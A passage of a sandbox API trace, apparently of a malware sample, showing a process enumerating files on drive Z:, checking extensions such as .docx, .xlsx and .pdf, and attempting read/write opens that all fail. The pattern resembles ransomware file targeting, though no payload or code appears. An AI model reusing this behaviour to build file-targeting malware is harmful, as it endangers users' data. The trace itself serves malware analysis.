ftLastWriteTime.dwLowDateTime=0xafbaabff, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x10ef0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="e8sPU7Zk.ots", cAlternateFileName="")) returned 1 [0186.446] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0186.446] PathFindExtensionW (pszPath="Z:\\e8sPU7Zk.ots") returned=".ots" [0186.450] CreateFileW (lpFileName="Z:\\e8sPU7Zk.ots" (normalized: "z:\\e8spu7zk.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.451] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0186.451] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbb4840, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2669c141, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbb4840, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x86e6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hRvB1xDrUsAHG.flv", cAlternateFileName="")) returned 1 [0186.451] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.451] PathFindExtensionW (pszPath="Z:\\hRvB1xDrUsAHG.flv") returned=".flv" [0186.455] CreateFileW (lpFileName="Z:\\hRvB1xDrUsAHG.flv" (normalized: "z:\\hrvb1xdrusahg.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.459] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.459] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266cce83, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x6047, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vnG2KifH.xlsx", cAlternateFileName="")) returned 1 [0186.459] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.459] PathFindExtensionW (pszPath="Z:\\vnG2KifH.xlsx") returned=".xlsx" [0186.464] CreateFileW (lpFileName="Z:\\vnG2KifH.xlsx" (normalized: "z:\\vng2kifh.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.465] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.465] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbb4840, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2669c141, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbb4840, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xcc3e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="foUlybK2h.xlsx", cAlternateFileName="")) returned 1 [0186.465] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.466] PathFindExtensionW (pszPath="Z:\\foUlybK2h.xlsx") returned=".xlsx" [0186.470] CreateFileW (lpFileName="Z:\\foUlybK2h.xlsx" (normalized: "z:\\foulybk2h.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.471] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.471] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb79eb7, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2658aa37, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb79eb7, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x4f93, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IZnOWmy.gif", cAlternateFileName="")) returned 1 [0186.471] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0186.471] PathFindExtensionW (pszPath="Z:\\IZnOWmy.gif") returned=".gif" [0186.476] CreateFileW (lpFileName="Z:\\IZnOWmy.gif" (normalized: "z:\\iznowmy.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.478] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0186.478] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb4916f, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26546475, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb4916f, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xb8e0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1FCq528Tci.avi", cAlternateFileName="")) returned 1 [0186.478] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.478] PathFindExtensionW (pszPath="Z:\\1FCq528Tci.avi") returned=".avi" [0186.483] CreateFileW (lpFileName="Z:\\1FCq528Tci.avi" (normalized: "z:\\1fcq528tci.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.484] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.484] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb52db1, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26559cf6, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb52db1, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xe48a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6IOKuPykR.odp", cAlternateFileName="")) returned 1 [0186.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.484] PathFindExtensionW (pszPath="Z:\\6IOKuPykR.odp") returned=".odp" [0186.489] CreateFileW (lpFileName="Z:\\6IOKuPykR.odp" (normalized: "z:\\6iokupykr.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.491] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.491] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb70276, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26580df7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb70276, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x758d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GeC6sbZ4BP3n.rtf", cAlternateFileName="")) returned 1 [0186.491] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.491] PathFindExtensionW (pszPath="Z:\\GeC6sbZ4BP3n.rtf") returned=".rtf" [0186.496] CreateFileW (lpFileName="Z:\\GeC6sbZ4BP3n.rtf" (normalized: "z:\\gec6sbz4bp3n.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.497] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.497] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb79eb7, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2658aa37, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb79eb7, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x904d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ICCtCDKhaB3ppqcf.pptx", cAlternateFileName="")) returned 1 [0186.497] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0186.497] PathFindExtensionW (pszPath="Z:\\ICCtCDKhaB3ppqcf.pptx") returned=".pptx" [0186.502] CreateFileW (lpFileName="Z:\\ICCtCDKhaB3ppqcf.pptx" (normalized: "z:\\icctcdkhab3ppqcf.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.504] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0186.504] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb52db1, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26559cf6, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb52db1, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x6825, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5IlHsHHuj.flv", cAlternateFileName="")) returned 1 [0186.504] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.504] PathFindExtensionW (pszPath="Z:\\5IlHsHHuj.flv") returned=".flv" [0186.508] CreateFileW (lpFileName="Z:\\5IlHsHHuj.flv" (normalized: "z:\\5ilhshhuj.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.510] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.510] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ec4bb, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x18042, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YfrMVx7qN.pdf", cAlternateFileName="")) returned 1 [0186.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.510] PathFindExtensionW (pszPath="Z:\\YfrMVx7qN.pdf") returned=".pdf" [0186.515] CreateFileW (lpFileName="Z:\\YfrMVx7qN.pdf" (normalized: "z:\\yfrmvx7qn.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.517] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ec4bb, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x17472, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="X9DJzkehG84l5iXYb.rtf", cAlternateFileName="")) returned 1 [0186.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0186.517] PathFindExtensionW (pszPath="Z:\\X9DJzkehG84l5iXYb.rtf") returned=".rtf" [0186.521] CreateFileW (lpFileName="Z:\\X9DJzkehG84l5iXYb.rtf" (normalized: "z:\\x9djzkehg84l5ixyb.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.524] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0186.524] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26675040, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x113a2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="arFxCRPaJOfVUXqGPh.pps", cAlternateFileName="")) returned 1 [0186.524] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0186.524] PathFindExtensionW (pszPath="Z:\\arFxCRPaJOfVUXqGPh.pps") returned=".pps" [0186.528] CreateFileW (lpFileName="Z:\\arFxCRPaJOfVUXqGPh.pps" (normalized: "z:\\arfxcrpajofvuxqgph.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0186.530] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbb4840, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2669c141, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbb4840, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xb72e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hzFXuXTiFAk.mp4", cAlternateFileName="")) returned 1 [0186.530] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.530] PathFindExtensionW (pszPath="Z:\\hzFXuXTiFAk.mp4") returned=".mp4" [0186.534] CreateFileW (lpFileName="Z:\\hzFXuXTiFAk.mp4" (normalized: "z:\\hzfxuxtifak.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.535] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.535] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb70276, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26580df7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb70276, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x86a0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HQARGMXmC2WYy.pdf", cAlternateFileName="")) returned 1 [0186.535] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.535] PathFindExtensionW (pszPath="Z:\\HQARGMXmC2WYy.pdf") returned=".pdf" [0186.540] CreateFileW (lpFileName="Z:\\HQARGMXmC2WYy.pdf" (normalized: "z:\\hqargmxmc2wyy.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.542] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.542] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266cce83, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x167a2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yusqqOM7hYB90.xlsx", cAlternateFileName="")) returned 1 [0186.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.542] PathFindExtensionW (pszPath="Z:\\yusqqOM7hYB90.xlsx") returned=".xlsx" [0186.547] CreateFileW (lpFileName="Z:\\yusqqOM7hYB90.xlsx" (normalized: "z:\\yusqqom7hyb90.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.548] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.548] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb70276, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2658aa37, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb70276, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x112b5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="I5MGz.gif", cAlternateFileName="")) returned 1 [0186.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0186.548] PathFindExtensionW (pszPath="Z:\\I5MGz.gif") returned=".gif" [0186.553] CreateFileW (lpFileName="Z:\\I5MGz.gif" (normalized: "z:\\i5mgz.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.555] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0186.555] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbd1d05, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266b9602, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbd1d05, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xa877, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rbURuD4ORn2Eem6rs.jpg", cAlternateFileName="")) returned 1 [0186.555] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0186.555] PathFindExtensionW (pszPath="Z:\\rbURuD4ORn2Eem6rs.jpg") returned=".jpg" [0186.560] CreateFileW (lpFileName="Z:\\rbURuD4ORn2Eem6rs.jpg" (normalized: "z:\\rburud4orn2eem6rs.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.562] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0186.562] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265e287a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x7b24, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VTE95H0m59pDCT9UO1IX.docx", cAlternateFileName="")) returned 1 [0186.562] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0186.562] PathFindExtensionW (pszPath="Z:\\VTE95H0m59pDCT9UO1IX.docx") returned=".docx" [0186.567] CreateFileW (lpFileName="Z:\\VTE95H0m59pDCT9UO1IX.docx" (normalized: "z:\\vte95h0m59pdct9uo1ix.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.568] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0186.568] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb70276, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26580df7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb70276, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x96af, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HYsyB74UdGWE4jIKpy9E.xlsx", cAlternateFileName="")) returned 1 [0186.568] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0186.568] PathFindExtensionW (pszPath="Z:\\HYsyB74UdGWE4jIKpy9E.xlsx") returned=".xlsx" [0186.574] CreateFileW (lpFileName="Z:\\HYsyB74UdGWE4jIKpy9E.xlsx" (normalized: "z:\\hysyb74udgwe4jikpy9e.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.575] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0186.575] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb52db1, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265500b5, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb52db1, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x13a81, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="455kYjCp7KIYqdl.gif", cAlternateFileName="")) returned 1 [0186.576] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.576] PathFindExtensionW (pszPath="Z:\\455kYjCp7KIYqdl.gif") returned=".gif" [0186.581] CreateFileW (lpFileName="Z:\\455kYjCp7KIYqdl.gif" (normalized: "z:\\455kyjcp7kiyqdl.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.591] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb70276, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26580df7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb70276, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xbf5c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F1p7Wn.swf", cAlternateFileName="")) returned 1 [0186.591] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0186.591] PathFindExtensionW (pszPath="Z:\\F1p7Wn.swf") returned=".swf" [0186.597] CreateFileW (lpFileName="Z:\\F1p7Wn.swf" (normalized: "z:\\f1p7wn.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.599] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0186.599] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb8d73a, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265d8c3a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb8d73a, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x9039, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SDdqr3L6NGsiR8gSS.png", cAlternateFileName="")) returned 1 [0186.599] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0186.599] PathFindExtensionW (pszPath="Z:\\SDdqr3L6NGsiR8gSS.png") returned=".png" [0186.604] CreateFileW (lpFileName="Z:\\SDdqr3L6NGsiR8gSS.png" (normalized: "z:\\sddqr3l6ngsir8gss.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.606] HeapFree 